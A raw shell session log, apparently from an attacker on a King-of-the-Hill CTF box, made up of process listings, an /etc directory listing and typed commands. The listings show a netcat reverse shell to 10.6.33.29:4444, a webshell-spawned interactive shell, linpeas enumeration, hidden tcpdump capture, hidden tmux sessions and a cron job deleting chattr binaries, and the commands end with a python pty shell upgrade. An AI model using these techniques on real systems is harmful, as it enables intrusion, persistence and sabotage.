root       233     2  0 18:02 ?        00:00:00   [raid5wq]
root       265     2  0 18:02 ?        00:00:00   [bioset]
root       291     2  0 18:02 ?        00:00:00   [jbd2/xvda1-8]
root       292     2  0 18:02 ?        00:00:00   [ext4-rsv-conver]
root       333     2  0 18:02 ?        00:00:00   [kworker/0:1H]
root       364     2  0 18:02 ?        00:00:00   [iscsi_eh]
root       366     2  0 18:02 ?        00:00:00   [ib_addr]
root       368     2  0 18:02 ?        00:00:00   [ib_mcast]
root       369     2  0 18:02 ?        00:00:00   [ib_nl_sa_wq]
root       370     2  0 18:02 ?        00:00:00   [ib_cm]
root       371     2  0 18:02 ?        00:00:00   [iw_cm_wq]
root       372     2  0 18:02 ?        00:00:00   [rdma_cm]
root       373     2  0 18:02 ?        00:00:00   [kauditd]
root      2293     2  0 18:17 ?        00:00:00   [kworker/0:3]
root      2822     2  0 18:22 ?        00:00:00   [kworker/u30:2]
root      2889     2  0 18:23 ?        00:00:00   [kworker/0:0]
root      3942     2  0 18:33 ?        00:00:00   [kworker/u30:1]
root      9994     2  0 18:38 ?        00:00:00   [kworker/0:1]
root         1     0  0 18:02 ?        00:00:05 /sbin/init
root       362     1  0 18:02 ?        00:00:00   /lib/systemd/systemd-journald
root       399     1  0 18:02 ?        00:00:00   /sbin/lvmetad -f
root       414     1  0 18:02 ?        00:00:00   /lib/systemd/systemd-udevd
systemd+   500     1  0 18:02 ?        00:00:00   /lib/systemd/systemd-timesyncd
root       704     1  0 18:02 ?        00:00:00   /sbin/dhclient -1 -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -I -df /var/lib/dhcp/dhclient6.eth0.leases eth0
root       886     1  0 18:02 ?        00:00:00   /usr/sbin/sshd -D
root      2611   886  0 18:19 ?        00:00:00     sshd: gloria [priv]
gloria    2664  2611  0 18:19 ?        00:00:00       sshd: gloria@pts/3
gloria    2667  2664  0 18:19 pts/3    00:00:00         -bash
root      2830   886  0 18:23 ?        00:00:00     sshd: gloria [priv]
gloria    2862  2830  0 18:23 ?        00:00:00       sshd: gloria@pts/1
gloria    2863  2862  0 18:23 pts/1    00:00:00         -bash
gloria    3155  2863  0 18:26 pts/1    00:00:00           /bin/sh ./linpeas.sh
gloria   13029  3155  2 18:39 pts/1    00:00:00             /bin/sh ./linpeas.sh
root      3475   886  0 18:28 ?        00:00:00     sshd: gloria [priv]
gloria    3518  3475  0 18:28 ?        00:00:00       sshd: gloria@pts/5
gloria    3519  3518  0 18:28 pts/5    00:00:00         -bash
gloria    7471  3519  0 18:36 pts/5    00:00:00           tmux -S /.dev/session
root      3662   886  0 18:29 ?        00:00:00     sshd: rsyslogd@notty
root      3699  3662  0 18:29 ?        00:00:00       sh -c /bin/sh
root      3700  3699  0 18:29 ?        00:00:00         /bin/sh
root      3788  3700  0 18:30 ?        00:00:00           tcpdump -i any -w /tmp/.systmd-private-c8egwc932h89fh3298
root      4051   886  0 18:33 ?        00:00:00     sshd: gloria [priv]
gloria    4094  4051  0 18:34 ?        00:00:00       sshd: gloria@pts/7
gloria    4095  4094  0 18:34 pts/7    00:00:00         -bash
gloria    4170  4095  0 18:35 pts/7    00:00:00           /usr/bin/tmux -S /.dev/session
root      9784   886  0 18:38 ?        00:00:00     sshd: daemonstaff [priv]
daemons+ 10111  9784  0 18:38 ?        00:00:00       sshd: daemonstaff@pts/11
daemons+ 10123 10111  0 18:38 pts/11   00:00:00         -bash
root     10309 10123  0 18:38 pts/11   00:00:00           sudo -s
root     10465 10309  0 18:38 pts/11   00:00:00             /bin/bash
root       889     1  0 18:02 ?        00:00:00   /usr/sbin/cron -f
root     11904   889  0 18:39 ?        00:00:00     /usr/sbin/CRON -f
root     11958 11904  0 18:39 ?        00:00:00       /bin/sh -c /usr/bin/find / -name "chattr" -exec rm -rf {} \;
root     11980 11958 10 18:39 ?        00:00:02         /usr/bin/find / -name chattr -exec rm -rf {} ;
root       894     1  0 18:02 ?        00:00:00   /usr/sbin/acpid
root       897     1  0 18:02 ?        00:00:00   /usr/lib/accountsservice/accounts-daemon
daemon     900     1  0 18:02 ?        00:00:00   /usr/sbin/atd -f
root       910     1  0 18:02 ?        00:00:00   /root/koth
gloria     930     1  0 18:02 ?        00:00:18   /usr/local/sbin/nhttpd
root       938     1  0 18:02 ?        00:00:00   /lib/systemd/systemd-logind
root       940     1  3 18:02 ?        00:01:21   /usr/bin/lxcfs /var/lib/lxcfs/
message+   947     1  0 18:02 ?        00:00:00   /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
syslog     951     1  0 18:02 ?        00:00:00   /usr/sbin/rsyslogd -n
root       977     1  0 18:02 ?        00:00:00   /usr/lib/snapd/snapd
root       990     1  0 18:02 ?        00:00:00   /sbin/iscsid
root       991     1  0 18:02 ?        00:00:00   /sbin/iscsid
mysql      996     1  0 18:02 ?        00:00:01   /usr/sbin/mysqld
root      1008     1  0 18:02 ?        00:00:00   php-fpm: master process (/etc/php/7.0/fpm/php-fpm.conf)
gloria    1028  1008  0 18:02 ?        00:00:01     php-fpm: pool www
gloria    4041  1028  0 18:33 ?        00:00:00       sh -c uname -a; w; id; /bin/sh -i
gloria    4045  4041  0 18:33 ?        00:00:00         /bin/sh -i
gloria    1029  1008  0 18:02 ?        00:00:00     php-fpm: pool www
gloria    5621  1008  0 18:35 ?        00:00:00     php-fpm: pool www
root      1019     1  0 18:02 ?        00:00:00   /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog
root      1025     1  0 18:02 ?        00:00:00   nginx: master process /usr/sbin/nginx -g daemon on; master_process on;
www-data  1026  1025  0 18:02 ?        00:00:05     nginx: worker process
root      1030     1  0 18:02 ?        00:00:00   /usr/lib/policykit-1/polkitd --no-debug
root      1129     1  0 18:02 ttyS0    00:00:00   /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220
root      1137     1  0 18:02 tty1     00:00:00   /sbin/agetty --noclear tty1 linux
root      1159     1  0 18:02 ?        00:00:03   /usr/sbin/apache2 -k start
alex      1406  1159  0 18:07 ?        00:00:03     /usr/sbin/apache2 -k start
alex      1413  1159  0 18:07 ?        00:00:04     /usr/sbin/apache2 -k start
alex      1414  1159  0 18:07 ?        00:00:03     /usr/sbin/apache2 -k start
alex      1448  1159  0 18:07 ?        00:00:04     /usr/sbin/apache2 -k start
alex      1450  1159  0 18:07 ?        00:00:04     /usr/sbin/apache2 -k start
alex      1461  1159  0 18:07 ?        00:00:03     /usr/sbin/apache2 -k start
alex      1466  1159  0 18:07 ?        00:00:03     /usr/sbin/apache2 -k start
alex      1475  1159  0 18:07 ?        00:00:03     /usr/sbin/apache2 -k start
alex      1503  1159  0 18:07 ?        00:00:03     /usr/sbin/apache2 -k start
alex      1506  1159  0 18:07 ?        00:00:03     /usr/sbin/apache2 -k start
alex      1514  1159  0 18:07 ?        00:00:04     /usr/sbin/apache2 -k start
alex      2118  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2125  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2129  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2130  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2135  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2136  1159  0 18:16 ?        00:00:01     /usr/sbin/apache2 -k start
alex      2145  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2147  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2149  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2151  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2153  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2155  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2156  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2157  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2163  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2165  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2169  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2170  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2172  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2181  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2200  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2203  1159  0 18:16 ?        00:00:01     /usr/sbin/apache2 -k start
alex      2208  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2216  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2219  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2231  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2232  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2233  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2234  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2242  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2248  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2251  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2253  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2262  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2325  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2358  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2434  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2440  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2441  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
root      1223     1  0 18:02 ?        00:00:00   /usr/bin/tmux -S /.dev/session new-session -d
root      1224  1223  0 18:02 pts/0    00:00:00     -sh
root      3742  1223  0 18:30 pts/6    00:00:00     -sh
root      3885  1223  0 18:32 pts/4    00:00:00     -sh
root      3954  1223  0 18:33 pts/8    00:00:00     -sh
root      4061  1223  0 18:33 pts/2    00:00:00     -sh
root      4171  1223  0 18:35 pts/9    00:00:00     -sh
root      7164  4171  0 18:36 pts/9    00:00:00       bash
root      7476  1223  0 18:36 pts/10   00:00:00     -sh
gloria    1650     1  0 18:09 ?        00:00:00   bash
gloria    1651  1650  0 18:09 ?        00:00:00     bash -i
gloria    1693     1  0 18:10 ?        00:00:01   systemd-pam
root      2073     1 15 18:15 pts/0    00:03:37   bash -i
root      2180     1 11 18:16 pts/0    00:02:38   bash -i
root      2420     1  0 18:17 pts/0    00:00:01   systemd-pam
gloria    2617     1  0 18:19 ?        00:00:00   /lib/systemd/systemd --user
gloria    2621  2617  0 18:19 ?        00:00:00     (sd-pam)
gloria    3063     1  5 18:25 ?        00:00:46   /usr/bin/python3 -
gloria    3123  3063  0 18:26 ?        00:00:00     [sh] <defunct>
root      3664     1  0 18:29 ?        00:00:00   /lib/systemd/systemd --user
root      3666  3664  0 18:29 ?        00:00:00     (sd-pam)
gloria    4117     1  0 18:34 ?        00:00:00   nc -l 127.0.0.1 12345
gloria    8220     1  0 18:36 ?        00:00:00   nc 10.6.33.29 4444
gloria    8221     1  0 18:36 ?        00:00:00   /bin/sh
gloria   13838  8221  0 18:39 ?        00:00:00     ps -efH
daemons+  9993     1  0 18:38 ?        00:00:00   /lib/systemd/systemd --user
daemons+  9998  9993  0 18:38 ?        00:00:00     (sd-pam)
/usr/bin/tmux -S /tmp/.session
open terminal failed: not a terminal



ls
user.txt
cd ../
ls
alex
gloria
marty
ls  -lisa /etc
total 860
131073  4 drwxr-xr-x 96 root root    4096 Oct  4 18:38 .
     2  4 drwxr-xr-x 25 root root    4096 Oct  4 18:28 ..
131164  0 -rw-------  1 root root       0 Aug  1  2017 .pwd.lock
278868  4 drwxr-xr-x  2 root root    4096 May  2  2020 ImageMagick-6
131165  4 drwxr-xr-x  8 root root    4096 May  2  2020 X11
146557  4 drwxr-xr-x  3 root root    4096 May  1  2020 acpi
131169  4 -rw-r--r--  1 root root    3028 Aug  1  2017 adduser.conf
131170  4 drwxr-xr-x  2 root root    4096 May  2  2020 alternatives
145629  4 drwxr-xr-x  8 root root    4096 May  3  2020 apache2
146209  4 drwxr-xr-x  3 root root    4096 May  1  2020 apm
131220  4 drwxr-xr-x  3 root root    4096 May  1  2020 apparmor
131224  4 drwxr-xr-x  9 root root    4096 May  1  2020 apparmor.d
146566  4 drwxr-xr-x  3 root root    4096 May  1  2020 apport
131233  4 drwxr-xr-x  6 root root    4096 May  1  2020 apt
146586  4 -rw-r-----  1 root daemon   144 Jan 14  2016 at.deny
131244  4 -rw-r--r--  1 root root    2188 Aug 31  2015 bash.bashrc
144763  4 -rw-r--r--  1 root root      45 Aug 12  2015 bash_completion
131245  4 drwxr-xr-x  2 root root    4096 May  1  2020 bash_completion.d
131247  4 -rw-r--r--  1 root root     367 Jan 27  2016 bindresvport.blacklist
131248  4 drwxr-xr-x  2 root root    4096 Apr 12  2016 binfmt.d
146630  4 drwxr-xr-x  2 root root    4096 May  1  2020 byobu
146171  4 drwxr-xr-x  3 root root    4096 May  1  2020 ca-certificates
151257  8 -rw-r--r--  1 root root    7788 May  1  2020 ca-certificates.conf
145090  4 drwxr-xr-x  2 root root    4096 May  1  2020 calendar
131249  4 drwxr-xr-x  2 root root    4096 May  1  2020 console-setup
131283  4 drwxr-xr-x  2 root root    4096 May  1  2020 cron.d
131285  4 drwxr-xr-x  2 root root    4096 May  1  2020 cron.daily
131291  4 drwxr-xr-x  2 root root    4096 May  1  2020 cron.hourly
131293  4 drwxr-xr-x  2 root root    4096 May  1  2020 cron.monthly
131295  4 drwxr-xr-x  2 root root    4096 May  1  2020 cron.weekly
131298  4 -rw-r--r--  1 root root     722 Apr  5  2016 crontab
146682  4 -rw-r--r--  1 root root      54 May  1  2020 crypttab
131299  4 drwxr-xr-x  4 root root    4096 May  1  2020 dbus-1
131308  4 -rw-r--r--  1 root root    2969 Nov 10  2015 debconf.conf
131309  4 -rw-r--r--  1 root root      12 Apr 30  2015 debian_version
131310  4 drwxr-xr-x  3 root root    4096 May  3  2020 default
131322  4 -rw-r--r--  1 root root     604 Jul  2  2015 deluser.conf
131323  4 drwxr-xr-x  2 root root    4096 May  1  2020 depmod.d
131325  4 drwxr-xr-x  4 root root    4096 May  1  2020 dhcp
131335  4 drwxr-xr-x  4 root root    4096 May  2  2020 dpkg
131342  4 -rw-r--r--  1 root root      96 Aug  1  2017 environment
144825  4 drwxr-xr-x  4 root root    4096 May  2  2020 fonts
145774  4 -rw-r--r--  1 root root     538 May  3  2020 fstab
131074  4 -rw-r--r--  1 root root     594 May  1  2020 fstab.orig
145317  4 -rw-r--r--  1 root root     280 Jun 20  2014 fuse.conf
131343  4 -rw-r--r--  1 root root    2584 Feb 18  2016 gai.conf
279148  4 drwxr-xr-x  4 root root    4096 May  2  2020 ghostscript
144936  4 drwxr-xr-x  2 root root    4096 May  1  2020 groff
157718  4 -rw-r--r--  1 root root    1191 Oct  4 18:37 group
145995  4 -rw-------  1 root root    1180 Oct  4 18:37 group-
152267  4 drwxr-xr-x  2 root root    4096 May  1  2020 grub.d
157717  4 -rw-r-----  1 root shadow  1042 Oct  4 18:37 gshadow
157719  4 -rw-r-----  1 root shadow  1053 Oct  4 18:37 gshadow+
131344  4 -rw-------  1 root root    1042 Oct  4 18:37 gshadow-
146102  4 drwxr-xr-x  3 root root    4096 May  1  2020 gss
146208  8 -rw-r--r--  1 root root    4781 Mar 17  2016 hdparm.conf
131346  4 -rw-r--r--  1 root root      92 Oct 22  2015 host.conf
131348  4 -rw-r--r--  1 root root       5 May  1  2020 hostname
152337  4 -rw-r--r--  1 root root     193 May  2  2020 hosts
131172  4 -rw-r--r--  1 root root     411 May  1  2020 hosts.allow
131173  4 -rw-r--r--  1 root root     711 May  1  2020 hosts.deny
131349  4 drwxr-xr-x  2 root root    4096 May  2  2020 init
131374  4 drwxr-xr-x  2 root root    4096 May  2  2020 init.d
131414  4 drwxr-xr-x  5 root root    4096 May  1  2020 initramfs-tools
131431  4 -rw-r--r--  1 root root    1748 Feb  4  2016 inputrc
131432  4 drwxr-xr-x  3 root root    4096 May  1  2020 insserv
131434  4 -rw-r--r--  1 root root     771 Mar  6  2015 insserv.conf
131435  4 drwxr-xr-x  2 root root    4096 Mar  6  2015 insserv.conf.d
131436  4 drwxr-xr-x  2 root root    4096 May  1  2020 iproute2
146068  4 drwxr-xr-x  2 root root    4096 May  1  2020 iscsi
131445  4 -rw-r--r--  1 root root      26 Jul 31  2017 issue
131446  4 -rw-r--r--  1 root root      19 Jul 31  2017 issue.net
131447  4 drwxr-xr-x  2 root root    4096 May  1  2020 kbd
131450  4 drwxr-xr-x  5 root root    4096 May  1  2020 kernel
152328  4 -rw-r--r--  1 root root     144 May  1  2020 kernel-img.conf
157703 32 -rw-r--r--  1 root root   30312 May  2  2020 ld.so.cache
131457  4 -rw-r--r--  1 root root      34 Jan 27  2016 ld.so.conf
131458  4 drwxr-xr-x  2 root root    4096 May  2  2020 ld.so.conf.d
157715  4 -rw-r--r--  1 root root      20 May  1  2020 ld.so.preload
145605  4 drwxr-xr-x  2 root root    4096 May  1  2020 ldap
131461  4 -rw-r--r--  1 root root     267 Oct 22  2015 legal
131462  4 -rw-r--r--  1 root root     191 Jan 18  2016 libaudit.conf
135458  4 drwxr-xr-x  2 root root    4096 May  1  2020 libnl-3
163841  4 drwxr-xr-x  2 root root    4096 Nov  4  2015 libpaper.d
131463  4 -rw-r--r--  1 root root    2995 Apr 14  2016 locale.alias
131464 12 -rw-r--r--  1 root root    9151 May  1  2020 locale.gen
131465  4 -rw-r--r--  1 root root    3585 May  1  2020 localtime
131466  4 drwxr-xr-x  6 root root    4096 May  1  2020 logcheck
131469 12 -rw-r--r--  1 root root   10551 Mar 29  2016 login.defs
131470  4 -rw-r--r--  1 root root     703 May  5  2015 logrotate.conf
131471  4 drwxr-xr-x  2 root root    4096 May  2  2020 logrotate.d
131475  4 -rw-r--r--  1 root root     105 Jul 31  2017 lsb-release
146229 16 -rw-r--r--  1 root root   14867 Apr 12  2016 ltrace.conf
147025  4 drwxr-xr-x  2 root root    4096 May  1  2020 lvm
131476  4 -r--r--r--  1 root root      33 May  1  2020 machine-id
131477  4 -rw-r--r--  1 root root     111 Nov 20  2015 magic
131478  4 -rw-r--r--  1 root root     111 Nov 20  2015 magic.mime
157556 16 -rw-r--r--  1 root root   12962 May  2  2020 mailcap
131480  4 -rw-r--r--  1 root root     449 Oct 30  2015 mailcap.order
145314  8 -rw-r--r--  1 root root    5170 Nov  6  2015 manpath.config
147106  4 drwxr-xr-x  2 root root    4096 May  1  2020 mdadm
131481 24 -rw-r--r--  1 root root   24241 Oct 30  2015 mime.types
131482  4 -rw-r--r--  1 root root     967 Oct 30  2015 mke2fs.conf
131483  4 drwxr-xr-x  2 root root    4096 May  1  2020 modprobe.d
131493  4 -rw-r--r--  1 root root     195 Aug  1  2017 modules
131494  4 drwxr-xr-x  2 root root    4096 May  1  2020 modules-load.d
131347  0 lrwxrwxrwx  1 root root      19 May  1  2020 mtab -> ../proc/self/mounts
146000  4 drwxr-xr-x  4 root root    4096 May  2  2020 mysql
146483 12 -rw-r--r--  1 root root    8338 Feb 15  2017 nanorc
131496  4 drwxr-xr-x  7 root root    4096 May  3  2020 network
131507  4 -rw-r--r--  1 root root      91 Oct 22  2015 networks
131508  4 drwxr-xr-x  2 root root    4096 May  1  2020 newt
163887  4 drwxr-xr-x  6 root root    4096 May  2  2020 nginx
131512  4 -rw-r--r--  1 root root     497 May  4  2014 nsswitch.conf
131513  4 drwxr-xr-x  2 root root    4096 Aug  1  2017 opt
131514  0 lrwxrwxrwx  1 root root      21 May  1  2020 os-release -> ../usr/lib/os-release
149996  8 -rw-r--r--  1 root root    6816 May 11  2017 overlayroot.conf
131515  4 -rw-r--r--  1 root root     552 Mar 16  2016 pam.conf
131516  4 drwxr-xr-x  2 root root    4096 May  1  2020 pam.d
157493  4 -rw-r--r--  1 root root       7 May  2  2020 papersize
157722  4 -rw-r--r--  1 root root    1785 Oct  4 18:35 passwd
145993  4 -rw-------  1 root root    1747 Oct  4 18:24 passwd-
145563  4 drwxr-xr-x  4 root root    4096 May  1  2020 perl
146872  4 drwxr-xr-x  3 root root    4096 May  1  2020 php
151036  4 drwxr-xr-x  3 root root    4096 May  1  2020 pm
149897  4 drwxr-xr-x  5 root root    4096 May  1  2020 polkit-1
151060  4 -rw-r--r--  1 root root     350 May  1  2020 popularity-contest.conf
131536  4 drwxr-xr-x  4 root root    4096 May  1  2020 ppp
131541  4 -rw-r--r--  1 root root     575 Oct 22  2015 profile
131542  4 drwxr-xr-x  2 root root    4096 May  1  2020 profile.d
131543  4 -rw-r--r--  1 root root    2932 Oct 25  2014 protocols
131544  4 drwxr-xr-x  2 root root    4096 May  1  2020 python3
131546  4 drwxr-xr-x  2 root root    4096 May  2  2020 python3.5
131548  4 -rwxr-xr-x  1 root root     306 Aug  1  2017 rc.local
131549  4 drwxr-xr-x  2 root root    4096 May  2  2020 rc0.d
131561  4 drwxr-xr-x  2 root root    4096 May  2  2020 rc1.d
131566  4 drwxr-xr-x  2 root root    4096 May  2  2020 rc2.d
131572  4 drwxr-xr-x  2 root root    4096 May  2  2020 rc3.d
131578  4 drwxr-xr-x  2 root root    4096 May  2  2020 rc4.d
131584  4 drwxr-xr-x  2 root root    4096 May  2  2020 rc5.d
131590  4 drwxr-xr-x  2 root root    4096 May  2  2020 rc6.d
131602  4 drwxr-xr-x  2 root root    4096 May  2  2020 rcS.d
131624  0 lrwxrwxrwx  1 root root      29 May  1  2020 resolv.conf -> ../run/resolvconf/resolv.conf
131625  4 drwxr-xr-x  4 root root    4096 May  1  2020 resolvconf
131632  4 -rwxr-xr-x  1 root root     268 Nov 10  2015 rmt
131633  4 -rw-r--r--  1 root root     887 Oct 25  2014 rpc
131634  4 -rw-r--r--  1 root root    1371 Jan 27  2016 rsyslog.conf
131635  4 drwxr-xr-x  2 root root    4096 May  1  2020 rsyslog.d
146626  4 -rw-r--r--  1 root root    3663 Jun  9  2015 screenrc
131637  4 -rw-r--r--  1 root root    4038 Mar 29  2016 securetty
131638  4 drwxr-xr-x  4 root root    4096 May  1  2020 security
131650  4 drwxr-xr-x  2 root root    4096 May  1  2020 selinux
131652 20 -rw-r--r--  1 root root   19605 Oct 25  2014 services
145359  4 drwxr-xr-x  2 root root    4096 May  1  2020 sgml
157720  4 -rw-r-----  1 root shadow  1565 Oct  4 18:37 shadow
131535  4 -rw-------  1 root root    1435 Oct  4 18:24 shadow-
131654  4 -rw-r--r--  1 root root     103 May  1  2020 shells
131655  4 drwxr-xr-x  2 root root    4096 May  1  2020 skel
149957  4 -rw-r--r--  1 root root     100 Jan 10  2017 sos.conf
146487  4 drwxr-xr-x  2 root root    4096 May  1  2020 ssh
146155  4 drwxr-xr-x  4 root root    4096 May  1  2020 ssl
131660  4 -rw-r--r--  1 root root     117 Oct  4 18:35 subgid
145989  4 -rw-------  1 root root      92 May  1  2020 subgid-
157716  4 -rw-r--r--  1 root root     117 Oct  4 18:35 subuid
131653  4 -rw-------  1 root root      92 May  1  2020 subuid-
157591  4 -r--r-----  1 root root     794 May  2  2020 sudoers
131662  4 drwxr-xr-x  2 root root    4096 May  1  2020 sudoers.d
131664  4 -rw-r--r--  1 root root    2084 Sep  6  2015 sysctl.conf
131665  4 drwxr-xr-x  2 root root    4096 May  1  2020 sysctl.d
131676  4 drwxr-xr-x  5 root root    4096 May  1  2020 systemd
131705  4 drwxr-xr-x  2 root root    4096 May  1  2020 terminfo
131707  4 -rw-r--r--  1 root root      11 May  1  2020 timezone
131708  4 drwxr-xr-x  2 root root    4096 Apr 12  2016 tmpfiles.d
131709  4 -rw-r--r--  1 root root    1260 Mar 16  2016 ucf.conf
131710  4 drwxr-xr-x  4 root root    4096 May  1  2020 udev
145780  4 drwxr-xr-x  3 root root    4096 May  1  2020 ufw
146084  4 drwxr-xr-x  3 root root    4096 May  1  2020 update-manager
131714  4 drwxr-xr-x  2 root root    4096 May  1  2020 update-motd.d
146090  4 drwxr-xr-x  2 root root    4096 May  1  2020 update-notifier
146481  4 -rw-r--r--  1 root root     338 Nov 18  2014 updatedb.conf
131717  4 drwxr-xr-x  2 root root    4096 May  1  2020 vim
149973  4 drwxr-xr-x  3 root root    4096 May  1  2020 vmware-tools
131720  0 lrwxrwxrwx  1 root root      23 May  1  2020 vtrgb -> /etc/alternatives/vtrgb
146523  8 -rw-r--r--  1 root root    4942 Mar  8  2017 wgetrc
131721  4 drwxr-xr-x  3 root root    4096 May  1  2020 xdg
146554  4 drwxr-xr-x  2 root root    4096 May  1  2020 xml
146174  4 -rw-r--r--  1 root root     477 Jul 19  2015 zsh_command_not_found
which   pythooon
which pyyython
python -c 'import pty; pty.spawn("/binn/bash");
'
/bin/sh: 27: python: not found

which python
whiiiiich python3
/bin/sh: 31: whiiiiich: not found
which python3
/usr/bin/python3
python3 -c 'import pty; pty.spawn("/bin/bash");'
ls -lisa
total 20
393344 4 drwxr-xr-x  5 root   root   4096 May  1  2020 .
     2 4 drwxr-xr-x 25 root   root   4096 Oct  4 18:28 ..
406229 4 drwxr-xr-x  3 alex   alex   4096 May  2  2020 alex
406255 4 drwxr-xr-x  6 gloria gloria 4096 Oct  4 18:40 gloria
406251 4 drwxr-xr-x  2 marty  marty  4096 May  2  2020 marty
ps -efH
UID        PID  PPID  C STIME TTY          TIME CMD
root         2     0  0 18:02 ?        00:00:00 [kthreadd]
root         3     2  0 18:02 ?        00:00:06   [ksoftirqd/0]
root         5     2  0 18:02 ?        00:00:00   [kworker/0:0H]
root         6     2  0 18:02 ?        00:00:00   [kworker/u30:0]
root         7     2  0 18:02 ?        00:00:02   [rcu_sched]
root         8     2  0 18:02 ?        00:00:00   [rcu_bh]
root         9     2  0 18:02 ?        00:00:00   [migration/0]
root        10     2  0 18:02 ?        00:00:00   [watchdog/0]
root        11     2  0 18:02 ?        00:00:00   [kdevtmpfs]
root        12     2  0 18:02 ?        00:00:00   [netns]
root        13     2  0 18:02 ?        00:00:00   [perf]
root        14     2  0 18:02 ?        00:00:00   [xenwatch]
root        15     2  0 18:02 ?        00:00:00   [xenbus]
root        17     2  0 18:02 ?        00:00:00   [khungtaskd]
root        18     2  0 18:02 ?        00:00:00   [writeback]
root        19     2  0 18:02 ?        00:00:00   [ksmd]
root        20     2  0 18:02 ?        00:00:00   [khugepaged]
root        21     2  0 18:02 ?        00:00:00   [crypto]
root        22     2  0 18:02 ?        00:00:00   [kintegrityd]
root        23     2  0 18:02 ?        00:00:00   [bioset]
root        24     2  0 18:02 ?        00:00:00   [kblockd]
root        25     2  0 18:02 ?        00:00:00   [ata_sff]
root        26     2  0 18:02 ?        00:00:00   [md]
root        27     2  0 18:02 ?        00:00:00   [devfreq_wq]
root        30     2  0 18:02 ?        00:00:12   [kswapd0]
root        31     2  0 18:02 ?        00:00:00   [vmstat]
root        32     2  0 18:02 ?        00:00:00   [fsnotify_mark]
root        33     2  0 18:02 ?        00:00:00   [ecryptfs-kthrea]
root        49     2  0 18:02 ?        00:00:00   [kthrotld]
root        50     2  0 18:02 ?        00:00:00   [acpi_thermal_pm]
root        51     2  0 18:02 ?        00:00:00   [bioset]
root        52     2  0 18:02 ?        00:00:00   [bioset]
root        53     2  0 18:02 ?        00:00:00   [bioset]
root        54     2  0 18:02 ?        00:00:00   [bioset]
root        55     2  0 18:02 ?        00:00:00   [bioset]
root        56     2  0 18:02 ?        00:00:00   [bioset]
root        57     2  0 18:02 ?        00:00:00   [bioset]
root        58     2  0 18:02 ?        00:00:00   [bioset]
root        59     2  0 18:02 ?        00:00:00   [scsi_eh_0]
root        60     2  0 18:02 ?        00:00:00   [scsi_tmf_0]
root        61     2  0 18:02 ?        00:00:00   [scsi_eh_1]
root        62     2  0 18:02 ?        00:00:00   [scsi_tmf_1]
root        64     2  0 18:02 ?        00:00:00   [bioset]
root        66     2  0 18:02 ?        00:00:00   [bioset]
root        70     2  0 18:02 ?        00:00:00   [ipv6_addrconf]
root        83     2  0 18:02 ?        00:00:00   [deferwq]
root        84     2  0 18:02 ?        00:00:00   [charger_manager]
root       124     2  0 18:02 ?        00:00:00   [bioset]
root       125     2  0 18:02 ?        00:00:00   [bioset]
root       126     2  0 18:02 ?        00:00:00   [bioset]
root       127     2  0 18:02 ?        00:00:00   [bioset]
root       128     2  0 18:02 ?        00:00:00   [bioset]
root       129     2  0 18:02 ?        00:00:00   [bioset]
root       130     2  0 18:02 ?        00:00:00   [bioset]
root       131     2  0 18:02 ?        00:00:00   [bioset]
root       132     2  0 18:02 ?        00:00:00   [kpsmoused]
root       147     2  0 18:02 ?        00:00:00   [ttm_swap]
root       233     2  0 18:02 ?        00:00:00   [raid5wq]
root       265     2  0 18:02 ?        00:00:00   [bioset]
root       291     2  0 18:02 ?        00:00:00   [jbd2/xvda1-8]
root       292     2  0 18:02 ?        00:00:00   [ext4-rsv-conver]
root       333     2  0 18:02 ?        00:00:00   [kworker/0:1H]
root       364     2  0 18:02 ?        00:00:00   [iscsi_eh]
root       366     2  0 18:02 ?        00:00:00   [ib_addr]
root       368     2  0 18:02 ?        00:00:00   [ib_mcast]
root       369     2  0 18:02 ?        00:00:00   [ib_nl_sa_wq]
root       370     2  0 18:02 ?        00:00:00   [ib_cm]
